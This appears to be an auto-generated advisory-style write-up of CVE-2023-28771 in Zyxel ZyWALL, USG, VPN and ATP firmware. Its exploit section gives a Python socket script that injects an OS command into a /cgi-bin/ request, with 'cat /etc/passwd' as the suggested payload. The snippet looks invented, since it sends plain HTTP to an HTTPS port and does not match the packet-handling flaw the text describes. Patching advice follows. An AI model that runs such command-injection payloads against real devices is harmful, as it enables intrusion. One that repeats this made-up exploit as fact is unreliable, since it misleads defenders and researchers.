A critical vulnerability (CVE-2023-28771) has been discovered in Zyxel ZyWALL/USG series firmware versions 4.60 through 4.73, VPN series firmware versions 4.60 through 5.35, USG FLEX series firmware versions 4.60 through 5.35, and ATP series firmware versions 4.60 through 5.35. This issue involves improper error handling, which could allow an unauthenticated attacker to remotely execute some OS commands by sending specially crafted packets to an affected device.

Exploit Details

The vulnerability is caused due to the improper handling of error messages by the affected firmware. An attacker can exploit this issue by sending specially crafted packets to a vulnerable device. As the device is not properly validating these packets, it allows the attacker to execute arbitrary OS commands on the device, granting them unauthorized access to the device and potentially compromising the integrity of the connected network.

The following code snippet demonstrates this vulnerability

import socket

target_ip = "192.168.1.1"  # Replace with the IP of your target device
target_port = 443         # Default HTTPS port; change if needed

payload = "GET /cgi-bin/;OS_COMMAND_HERE;"  # Replace OS_COMMAND_HERE with a desired OS command

# Craft packet
packet = f"{payload} HTTP/1.1\r\nHost: {target_ip}\r\n\r\n"

# Send packet
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, target_port))
sock.send(packet.encode())
response = sock.recv(1024)
sock.close()

print(response.decode())

Replace "OS_COMMAND_HERE" with the desired OS command you want to execute on the target device, such as "cat /etc/passwd" to print the contents of the passwd file.

Original references

This vulnerability was discovered by security researchers, and a detailed analysis is available at the following links:

1. Zyxel security advisory: https://www.zyxel.com/support/CVE-2023-28771.shtml
2. CVE details page: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28771

Mitigation and Recommendations

Zyxel has released firmware updates for affected devices to address the vulnerability. It is strongly recommended that users of the affected products update their firmware to the latest version as soon as possible. The latest firmware can be found on Zyxel's support website (https://www.zyxel.com/support/).

Additionally, users are advised to restrict incoming network traffic to their devices and closely monitor their network activity for any signs of unauthorized access or suspicious activity.

Conclusion

In summary, a critical vulnerability (CVE-2023-28771) has been discovered in various Zyxel firewall and VPN devices that allows an unauthenticated attacker to execute OS commands remotely by sending crafted packets to the affected device. Affected users should immediately update their firmware and follow the recommended mitigation strategies to protect their networks from potential attacks. And as always, stay vigilant and keep following cybersecurity best practices to safeguard your network.

Timeline

Published on: 04/25/2023 02:15:00 UTC
Last modified on: 05/04/2023 18:46:00 UTC